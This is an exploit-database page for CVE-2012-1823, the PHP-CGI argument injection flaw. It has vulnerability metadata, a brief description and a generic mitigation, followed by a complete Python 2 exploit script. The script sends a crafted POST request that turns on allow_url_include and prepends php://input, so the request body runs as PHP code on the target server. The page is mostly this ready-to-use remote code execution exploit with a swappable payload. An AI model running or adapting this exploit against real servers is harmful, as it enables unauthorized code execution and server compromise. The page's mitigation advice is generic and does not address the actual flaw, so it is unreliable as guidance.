header-logo
Suggest Exploit
vendor:
N/A
by:
rayh4c[0x40]80sec[0x2e]com
9,3
CVSS
HIGH
Argument Injection
94
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2012-1823
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-31631/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0686/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2012-1823/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2012-2311/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2012-1823/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2012-2311/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0568/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0569/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-2311/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2012-77/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-1437-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0546/https://www.rapid7.com/db/vulnerabilities/apple-osx-note-cve-2012-1823/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-59b68b1e-9c78-11e1-b5e0-000c299b62e1/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-60de13d5-95f0-11e1-806a-001143cd36d8/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-1823/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-2336/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-1823/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-2336/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2012-2311/https://www.rapid7.com/db/?q=CVE-2012-1823&type=&page=2https://www.rapid7.com/db/?q=CVE-2012-1823&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Cve-2012-1823 PHP CGI Argument Injection Exploit

This exploit allows an attacker to inject arbitrary code into a vulnerable web application. The exploit is triggered when a malicious user sends a specially crafted HTTP POST request to the vulnerable web application. The malicious code is then executed on the server, allowing the attacker to gain access to the server and potentially execute arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any application logic.
Source

Exploit-DB raw data:

######################################################################################
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
######################################################################################

import socket
import sys

def cgi_exploit():
        pwn_code = """<?php phpinfo();?>""" 
        post_Length = len(pwn_code)
        http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" %(HOST , post_Length ,pwn_code)
        print http_raw
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((HOST, int(PORT)))
            sock.send(http_raw)
            data = sock.recv(10000)
            print repr(data)
            sock.close()
        except socket.error, msg:
            sys.stderr.write("[ERROR] %s\n" % msg[1])
            sys.exit(1)
               
if __name__ == '__main__':
        try:
            HOST = sys.argv[1]
            PORT = sys.argv[2]
            cgi_exploit()
        except IndexError:
            print '[+]Usage: cgi_test.py site.com 80'
            sys.exit(-1)